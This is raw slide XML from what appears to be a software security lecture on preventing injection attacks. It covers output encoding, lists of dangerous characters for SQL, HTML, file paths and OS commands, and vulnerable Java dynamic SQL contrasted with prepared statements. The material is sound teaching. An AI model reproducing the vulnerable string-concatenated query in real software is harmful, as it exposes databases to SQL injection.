            <a:xfrm>
              <a:off x="5388290" y="1853310"/>
              <a:ext cx="1934111" cy="33702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HTML</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-GB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 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renderer</a:t>
              </a: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5325073" y="2332476"/>
              <a:ext cx="1790431" cy="31683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email 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Times New Roman" pitchFamily="16" charset="0"/>
                </a:rPr>
                <a:t>program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="50" name="Groep 49"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4399278" y="1806361"/>
              <a:ext cx="960201" cy="384481"/>
              <a:chOff x="5362575" y="1660585"/>
              <a:chExt cx="865609" cy="384481"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Right Arrow 34"/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52" name="Rechthoek 51"/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53" name="Rechthoek 52"/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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Vrije vorm 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2761056" y="1902162"/>
              <a:ext cx="1185833" cy="548333"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1353065"/>
                <a:gd name="connsiteY0" fmla="*/ 44720 h 548333"/>
                <a:gd name="connsiteX1" fmla="*/ 284205 w 1353065"/>
                <a:gd name="connsiteY1" fmla="*/ 81791 h 548333"/>
                <a:gd name="connsiteX2" fmla="*/ 315097 w 1353065"/>
                <a:gd name="connsiteY2" fmla="*/ 260964 h 548333"/>
                <a:gd name="connsiteX3" fmla="*/ 166816 w 1353065"/>
                <a:gd name="connsiteY3" fmla="*/ 403066 h 548333"/>
                <a:gd name="connsiteX4" fmla="*/ 599303 w 1353065"/>
                <a:gd name="connsiteY4" fmla="*/ 520456 h 548333"/>
                <a:gd name="connsiteX5" fmla="*/ 945292 w 1353065"/>
                <a:gd name="connsiteY5" fmla="*/ 520456 h 548333"/>
                <a:gd name="connsiteX6" fmla="*/ 685800 w 1353065"/>
                <a:gd name="connsiteY6" fmla="*/ 211537 h 548333"/>
                <a:gd name="connsiteX7" fmla="*/ 543697 w 1353065"/>
                <a:gd name="connsiteY7" fmla="*/ 57077 h 548333"/>
                <a:gd name="connsiteX8" fmla="*/ 797011 w 1353065"/>
                <a:gd name="connsiteY8" fmla="*/ 7650 h 548333"/>
                <a:gd name="connsiteX9" fmla="*/ 932935 w 1353065"/>
                <a:gd name="connsiteY9" fmla="*/ 205358 h 548333"/>
                <a:gd name="connsiteX10" fmla="*/ 1186249 w 1353065"/>
                <a:gd name="connsiteY10" fmla="*/ 87969 h 548333"/>
                <a:gd name="connsiteX11" fmla="*/ 1353065 w 1353065"/>
                <a:gd name="connsiteY11" fmla="*/ 81791 h 54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3065" h="548333">
                  <a:moveTo>
                    <a:pt x="0" y="44720"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115844" y="45235"/>
                    <a:pt x="231689" y="45750"/>
                    <a:pt x="284205" y="81791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336721" y="117832"/>
                    <a:pt x="334662" y="207418"/>
                    <a:pt x="315097" y="260964"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295532" y="314510"/>
                    <a:pt x="119448" y="359817"/>
                    <a:pt x="166816" y="403066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214184" y="446315"/>
                    <a:pt x="469557" y="500891"/>
                    <a:pt x="599303" y="520456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="729049" y="540021"/>
                    <a:pt x="930876" y="571943"/>
                    <a:pt x="945292" y="520456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="959708" y="468969"/>
                    <a:pt x="752733" y="288767"/>
                    <a:pt x="685800" y="211537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="618868" y="134307"/>
                    <a:pt x="525162" y="91058"/>
                    <a:pt x="543697" y="57077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="562232" y="23096"/>
                    <a:pt x="732138" y="-17063"/>
                    <a:pt x="797011" y="7650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="861884" y="32363"/>
                    <a:pt x="868062" y="191972"/>
                    <a:pt x="932935" y="205358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="997808" y="218744"/>
                    <a:pt x="1116227" y="108563"/>
                    <a:pt x="1186249" y="87969"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1256271" y="67375"/>
                    <a:pt x="1304668" y="74583"/>
                    <a:pt x="1353065" y="81791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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Groep 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02E67CB-0221-F2CE-556A-A3B8D6641BD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="1227250">
              <a:off x="4399983" y="2156564"/>
              <a:ext cx="865609" cy="384481"/>
              <a:chOff x="5362575" y="1660585"/>
              <a:chExt cx="865609" cy="384481"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Right Arrow 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305DB7ED-CE2C-1AB9-84EC-15837D3BA5D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5362575" y="1660585"/>
                <a:ext cx="865609" cy="3844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6407">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rechthoek 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0A71FA-2D2C-2C1A-685E-C6C29339DCFE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5508789" y="1772185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6568F7DE-5AD2-711D-2500-F8C88EFBCB3B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5797005" y="1768396"/>
                <a:ext cx="144000" cy="1612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31" tIns="45715" rIns="91431" bIns="45715"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="492074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GB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4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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="825248">
            <a:off x="4231334" y="2744317"/>
            <a:ext cx="865609" cy="384481"/>
            <a:chOff x="5362575" y="1660585"/>
            <a:chExt cx="865609" cy="384481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37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42" name="Rechthoek 41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43" name="Rechthoek 42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777230" y="1004642"/>
            <a:ext cx="7918648" cy="498131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	 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1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If we sanitise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instead of inputs then sanitisation can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tailored to the context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en-GB" sz="1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GB" sz="1600" dirty="0"/>
              <a:t>for SQL database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’ ” DROP TABLE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00050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>for HTML renderer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 &amp; script    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>for file system       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.. / \  ~                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>for OS command          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| ||  &lt;  &gt;   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2385687" y="1267397"/>
            <a:ext cx="1956004" cy="187914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OnlineShop.nl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Groep 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="825248">
            <a:off x="4295336" y="2303981"/>
            <a:ext cx="865609" cy="384481"/>
            <a:chOff x="5362575" y="1660585"/>
            <a:chExt cx="865609" cy="384481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29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30" name="Rechthoek 29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2" name="Rechthoek 31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198568" cy="845345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Output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</a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>aka output encoding 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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19476" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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4" y="1478401"/>
            <a:ext cx="751014" cy="74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28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1653857" y="1772670"/>
            <a:ext cx="711714" cy="262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407">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Groep 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20098825">
            <a:off x="4284531" y="1260665"/>
            <a:ext cx="865609" cy="384481"/>
            <a:chOff x="5362575" y="1660585"/>
            <a:chExt cx="865609" cy="384481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44" name="Rechthoek 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3850932" y="1474253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B1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1" name="Rechthoek 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2380421" y="1701590"/>
            <a:ext cx="381600" cy="52662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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Stroomdiagram: Magnetische schijf 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175768" y="925882"/>
            <a:ext cx="1194784" cy="794655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customer database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" name="Afgeronde rechthoek 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5242379" y="2472480"/>
            <a:ext cx="1547371" cy="38279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file system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5270343" y="1887277"/>
            <a:ext cx="1934111" cy="3370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renderer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5130239" y="2959309"/>
            <a:ext cx="1746017" cy="37315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email program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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Groep 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4300746" y="1793889"/>
            <a:ext cx="960201" cy="384481"/>
            <a:chOff x="5362575" y="1660585"/>
            <a:chExt cx="865609" cy="384481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Right Arrow 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5362575" y="1660585"/>
              <a:ext cx="865609" cy="3844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52" name="Rechthoek 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5508789" y="1772185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5797005" y="1768396"/>
              <a:ext cx="144000" cy="1612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38" name="Rechthoek 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3860221" y="1860133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B2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9" name="Rechthoek 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3858784" y="2244660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B3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0" name="Rechthoek 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3850931" y="2654015"/>
            <a:ext cx="472273" cy="31886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Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>B4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4" name="Vrije vorm 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2734416" y="1982469"/>
            <a:ext cx="1124365" cy="720769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1353065"/>
              <a:gd name="connsiteY0" fmla="*/ 44720 h 548333"/>
              <a:gd name="connsiteX1" fmla="*/ 284205 w 1353065"/>
              <a:gd name="connsiteY1" fmla="*/ 81791 h 548333"/>
              <a:gd name="connsiteX2" fmla="*/ 315097 w 1353065"/>
              <a:gd name="connsiteY2" fmla="*/ 260964 h 548333"/>
              <a:gd name="connsiteX3" fmla="*/ 166816 w 1353065"/>
              <a:gd name="connsiteY3" fmla="*/ 403066 h 548333"/>
              <a:gd name="connsiteX4" fmla="*/ 599303 w 1353065"/>
              <a:gd name="connsiteY4" fmla="*/ 520456 h 548333"/>
              <a:gd name="connsiteX5" fmla="*/ 945292 w 1353065"/>
              <a:gd name="connsiteY5" fmla="*/ 520456 h 548333"/>
              <a:gd name="connsiteX6" fmla="*/ 685800 w 1353065"/>
              <a:gd name="connsiteY6" fmla="*/ 211537 h 548333"/>
              <a:gd name="connsiteX7" fmla="*/ 543697 w 1353065"/>
              <a:gd name="connsiteY7" fmla="*/ 57077 h 548333"/>
              <a:gd name="connsiteX8" fmla="*/ 797011 w 1353065"/>
              <a:gd name="connsiteY8" fmla="*/ 7650 h 548333"/>
              <a:gd name="connsiteX9" fmla="*/ 932935 w 1353065"/>
              <a:gd name="connsiteY9" fmla="*/ 205358 h 548333"/>
              <a:gd name="connsiteX10" fmla="*/ 1186249 w 1353065"/>
              <a:gd name="connsiteY10" fmla="*/ 87969 h 548333"/>
              <a:gd name="connsiteX11" fmla="*/ 1353065 w 1353065"/>
              <a:gd name="connsiteY11" fmla="*/ 81791 h 5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065" h="548333">
                <a:moveTo>
                  <a:pt x="0" y="44720"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115844" y="45235"/>
                  <a:pt x="231689" y="45750"/>
                  <a:pt x="284205" y="81791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336721" y="117832"/>
                  <a:pt x="334662" y="207418"/>
                  <a:pt x="315097" y="260964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="295532" y="314510"/>
                  <a:pt x="119448" y="359817"/>
                  <a:pt x="166816" y="403066"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214184" y="446315"/>
                  <a:pt x="469557" y="500891"/>
                  <a:pt x="599303" y="520456"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="729049" y="540021"/>
                  <a:pt x="930876" y="571943"/>
                  <a:pt x="945292" y="520456"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="959708" y="468969"/>
                  <a:pt x="752733" y="288767"/>
                  <a:pt x="685800" y="211537"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="618868" y="134307"/>
                  <a:pt x="525162" y="91058"/>
                  <a:pt x="543697" y="57077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="562232" y="23096"/>
                  <a:pt x="732138" y="-17063"/>
                  <a:pt x="797011" y="7650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="861884" y="32363"/>
                  <a:pt x="868062" y="191972"/>
                  <a:pt x="932935" y="205358"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="997808" y="218744"/>
                  <a:pt x="1116227" y="108563"/>
                  <a:pt x="1186249" y="87969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1256271" y="67375"/>
                  <a:pt x="1304668" y="74583"/>
                  <a:pt x="1353065" y="8179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2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8F8-C1BE-6B77-AF5F-04C1B4CF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Output encoding to prevent injection attacks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7358-3B34-EB09-BB85-1936BBCC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We can prevent injection attacks by careful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>output encoding                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>- in the right place, using the right encoding function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>However, this is easy to get wrong...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More structural approaches to prevent or spot mistakes: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Prepared statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka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Parameterised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> queries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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a: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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Easy to get right – as it gets rid of the problem.                                    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     But... only works in simple settings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Tainting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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    Using DAST or SAST tool to spot or add missing encodings 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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe Builders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    Using type system to prevent missing or wrong encodings</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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F90C8-C19F-1812-3CD7-12347F9779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328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a) Prepared Statements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2689834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altLang="nl-NL" sz="2400" dirty="0"/>
              <a:t>Dynamic SQL vs Prepared statements </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1800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16013"/>
            <a:ext cx="7918648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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interface with SQL database can use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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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      one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> string, which includes user input, is provided as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL query  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                              </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400" b="1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>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"SELECT * FROM Account WHERE Username = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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$username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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ "AND Password = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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$password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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633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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterised queries: </a:t>
            </a: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>
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a string with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>placeholders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is provided as query,                                                      and user inputs are provide as separate parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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9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     "SELECT * FROM Account WHERE Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a: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 AND Password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-N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$username                                                                                                 $password  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340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492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8645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5797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fld id="{7EAD3E82-A49F-41B4-8E03-BFC3A5A66C5A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  <a:defRPr/>
              </a:pPr>
              <a:t>74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2073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76225"/>
            <a:ext cx="8280920" cy="992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/>
              <a:t>Dynamic SQL &amp; prepared statements in Java  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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Code vulnerable to SQLi using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic SQL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String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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =   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 </a:t>
            </a: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"SELECT * FROM Account WHERE Username"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+ username + "AND Password =" + password;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stmt.executeUpdate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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0"/>
              <a:t>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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prepared statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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login =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con.preparedStatement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("SELECT * FROM Account  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       WHERE Username = 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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> AND Password = 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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" 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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, username); 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>
